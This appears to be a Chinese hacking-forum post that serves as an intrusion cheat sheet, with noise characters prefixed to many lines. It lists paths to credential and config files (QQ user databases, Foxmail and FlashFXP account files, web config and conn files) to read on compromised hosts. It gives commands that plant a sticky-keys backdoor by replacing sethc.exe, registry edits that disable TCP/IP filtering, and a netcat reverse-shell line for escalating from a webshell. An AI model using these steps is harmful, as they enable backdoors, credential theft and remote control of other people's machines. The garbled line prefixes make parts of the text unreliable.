( y/ v- |! ]! S5 @C:\Program Files\Apache Group\Apache2\bin\Apache.exe
. M% G: v. v# \) d, h8 w/ T/usr/local/tomcat5527/bin/version.sh
$ g1 S7 b7 @" S7 U  t& X1 f+ ]/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
c:\Program Files\QQ2007\qq.exe
# D% d" g( v7 r8 ]0 Jc:\Program Files\Tencent\qq\User.db
. b  i. e  H! n# [# \" I+ f0 Ac:\Program Files\Tencent\qq\qq.exe
c:\Program Files\Tencent\qq\bin\qq.exe
; W' I1 m3 X! ]7 gc:\Program Files\Tencent\qq2009\qq.exe
" X8 o1 U4 u% z/ }) o3 s% D. D5 Z3 P" gc:\Program Files\Tencent\qq2008\qq.exe
c:\Program Files\Tencent\qq2010\bin\qq.exe
c:\Program Files\Tencent\qq\Users\All Users\Registry.db
C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
5 f0 W6 x5 T1 T4 F1 uc:\Program Files\Tencent\Tm\Bin\Txplatform.exe
c:\Program Files\Tencent\RTXServer\AppConfig.xml
" b( o( q* P/ S9 G( C& XC:\Program Files\Foxmal\Foxmail.exe
! v0 M4 j0 R9 a1 z+ {! U- RC:\Program Files\Foxmal\accounts.cfg
C:\Program Files\tencent\Foxmal\Foxmail.exe
* b! |' U. Z$ U) eC:\Program Files\tencent\Foxmal\accounts.cfg
C:\Program Files\LeapFTP 3.0\LeapFTP.exe
" x- [5 J0 Y( ]  RC:\Program Files\LeapFTP\LeapFTP.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
' B0 o; A# g$ F8 l$ g  jC:\Program Files\FlashFXP\FlashFXP.ini
/ c5 O$ N6 f% R4 f5 cC:\Program Files\FlashFXP\flashfxp.exe
% _; L" S' ?( {3 T, A7 t% mc:\Program Files\Oracle\bin\regsvr32.exe
c:\Program Files\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\QQGAME\readme.txt
C:\Program Files\StormII\Storm.exe

6 _( c" y/ L& T! Y- b. T- q1 U. t3.网站相对路径:
; l$ \3 V& l  S  g( M
8 G* S8 C1 O, U( K/ V: d& z# s/config.php
../../config.php
; X% g3 @" b) D* X../config.php
../../../config.php
/config.inc.php
./config.inc.php
5 N7 d+ `: t" o! V4 n7 c7 T2 o../../config.inc.php
6 b: X# o* `* U8 f$ A! d../config.inc.php
../../../config.inc.php
/conn.php
./conn.php
../../conn.php
. [2 A! @( E" L( a7 b- S0 e../conn.php
../../../conn.php
/conn.asp
- V" [* D5 g& Q, k4 a' x7 N$ x0 X./conn.asp
../../conn.asp
# d+ U4 a2 k, j! z. z) f../conn.asp
../../../conn.asp
; s& k8 |& X/ g/config.inc.php
# q/ z2 w( g# [$ u3 l5 V( C( Q./config.inc.php
../../config.inc.php
6 j7 ^, K) V& Y% J0 y../config.inc.php
../../../config.inc.php
+ h4 m3 k1 D! ?7 p% g) _2 ~/config/config.php
) t" m0 ?3 C+ ?1 `, b  f../../config/config.php
# P' N& T( U. p../config/config.php
7 H. P; Q4 T' G, t/ Q../../../config/config.php
/ e% W7 f2 c% \9 ?% S  }2 l/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
8 N) H+ E9 B# u8 G' C# j/config/conn.php
./config/conn.php
../../config/conn.php
../config/conn.php
& `: g7 l9 y& `! s6 {../../../config/conn.php
" @7 _6 E, q7 V" t/config/conn.asp
, S& k  I! E* R./config/conn.asp
2 w( m" I& ?+ G5 C8 N) k* E../../config/conn.asp
% v* ?0 e  Q1 _$ \../config/conn.asp
8 Q3 C+ |5 q4 n( e6 H' _../../../config/conn.asp
# E# e+ Z  G5 y: q, O  R/config/config.inc.php
7 n' {& t! K0 Z0 |, n! ~./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
  I$ l5 C( V0 }  V! x# }/ h0 @8 }/data/config.php
/ Q& |  W# b" V../../data/config.php
../data/config.php
../../../data/config.php
/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
5 R; x3 a" u9 R0 u4 E5 _../data/config.inc.php
9 z( _* W  ]6 Y& r  G$ q( p../../../data/config.inc.php
/data/conn.php
./data/conn.php
../../data/conn.php
../data/conn.php
5 y7 t0 b, w# Q2 s../../../data/conn.php
- ~8 f5 F2 W% i3 _% R) h9 z/data/conn.asp
4 z2 e) i8 O8 `8 V2 b( {6 V7 A./data/conn.asp
" v" F# o7 @/ z. H4 h../../data/conn.asp
../data/conn.asp
& T7 Y3 G4 P# n9 V" Y, U../../../data/conn.asp
/data/config.inc.php
" T3 n) l, {) j./data/config.inc.php
- Z0 X* u8 \: h6 r../../data/config.inc.php
& a5 S: b! b  L( W6 p+ c5 q../data/config.inc.php
../../../data/config.inc.php
/include/config.php
../../include/config.php
../include/config.php
../../../include/config.php
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
" h, y& U/ t3 d' \6 V9 J../include/config.inc.php
2 Y1 G( X$ Y8 H  J( w4 y../../../include/config.inc.php
/include/conn.php
./include/conn.php
- S+ j: k% c  i- v) _. y- n../../include/conn.php
% w; |. d  G/ A../include/conn.php
' r8 O' [  N4 x8 D' U; z0 R9 R../../../include/conn.php
( [2 w- Z2 s( K7 H8 Y4 i/include/conn.asp
' \/ ?  y' N8 e) ?: L4 t  U./include/conn.asp
* m5 P8 A$ y% o# P6 Q../../include/conn.asp
../include/conn.asp
../../../include/conn.asp
! j4 N- D7 D; @0 l/include/config.inc.php
. v  ?. E  o8 Z5 f) A& s./include/config.inc.php
) P' |, @, B% M6 c( g../../include/config.inc.php
/ _7 |- u8 |2 q6 i: }../include/config.inc.php
../../../include/config.inc.php
& I& `; o6 ^  S$ x/inc/config.php
0 w( F% }- C* _+ v../../inc/config.php
../inc/config.php
$ E$ h/ ?% W( t8 P../../../inc/config.php
/inc/config.inc.php
./inc/config.inc.php
+ v+ K  I2 n: j" I4 Z../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
/inc/conn.php
./inc/conn.php
../../inc/conn.php
* a' a6 {7 d  g" k7 n0 e../inc/conn.php
( h' b9 u4 Z6 S, O9 R* U../../../inc/conn.php
; V' J3 Q0 A, ]) e/inc/conn.asp
: ~2 s% C% q! t: h./inc/conn.asp
. y* E% q1 d( F0 ]4 {5 V  b7 V../../inc/conn.asp
) D  K/ d8 u# o  A. r3 F# O; b* S../inc/conn.asp
../../../inc/conn.asp
% Z3 L: |! K* a" y& h/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
: J( l( Q/ n5 O4 L( A: R8 ]: W../inc/config.inc.php
../../../inc/config.inc.php
7 a- m: R( T7 h4 f5 b/index.php
3 ^- ?" X2 |) X% O9 O( ~5 S./index.php
8 u, S* a- h9 v+ J) a) `6 u../../index.php
3 C4 W) W6 q# `../index.php
4 I+ c3 F  L* v" S$ l../../../index.php
/index.asp
) F( r% J6 J8 j6 d# s( @./index.asp
# ^/ @" H! `2 J8 ^../../index.asp
../index.asp
% Z2 \+ O* H6 `5 x../../../index.asp
替换SHIFT后门
　attrib c:\windows\system32\sethc.exe -h -r -s
  _  d$ ~0 V' j% @
4 i- c3 m# i9 r3 a1 L　　attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
- R5 Z( R9 u) L# y% Z* z3 }
1 }  g# t# f' P) X4 e　　del c:\windows\system32\sethc.exe

$ t1 P+ n3 D) w( z, Y; |( O　　copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

' w# D/ M/ v9 Y2 u　　copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
* o$ N1 A1 x; K+ r$ v: f
1 F( p) |( a! R) R; W　　attrib c:\windows\system32\sethc.exe +h +r +s

) U2 R7 p5 x1 M6 R3 l' x# Q6 R　　attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
去除TCPIP筛选
TCP/IP筛选在注册表里有三处，分别是：
0 \. D0 I( L) VHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
: M/ o+ u" k( q' ]5 u! O) MHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ x" E# U& J: C  K4 }* ^& Cregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
3 h  ~$ }, T1 A命令来导出注册表项

5 _9 m# I7 o, O, K然后把 三个文件里的EnableSecurityFilters"=dword:00000001，改成EnableSecurityFilters"=dword:00000000
) n; i' h& ~# q" \& ?! w! q, s
. Q$ l: V; f* U5 y再将以上三个文件分别用
) k7 }/ y. K, T% w) b, I% Nregedit -s D:\a.reg
regedit -s D:\b.reg
5 d6 D! X' B# T9 D. M9 G( Bregedit -s D:\c.reg
2 m6 F. O7 o$ O导入注册表即可
5 M* B# C0 t( w/ p  g1 ~8 l
webshell提权小技巧
cmd路径:
c:\windows\temp\cmd.exe
* u: F9 b' r5 ?7 s2 Unc也在同目录下
例如反弹cmdshell：
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
4 B. b3 R. F# o: T2 Y3 \通常都不会成功。
0 V. ^+ y0 N5 E  k
而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
命令输入   -vv ip 999 -e c:\windows\temp\cmd.exe
却能成功。。
/ ?, C5 l% |# b, J" y这个不是重点
; P) h7 ?) e5 g1 {' p$ \我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2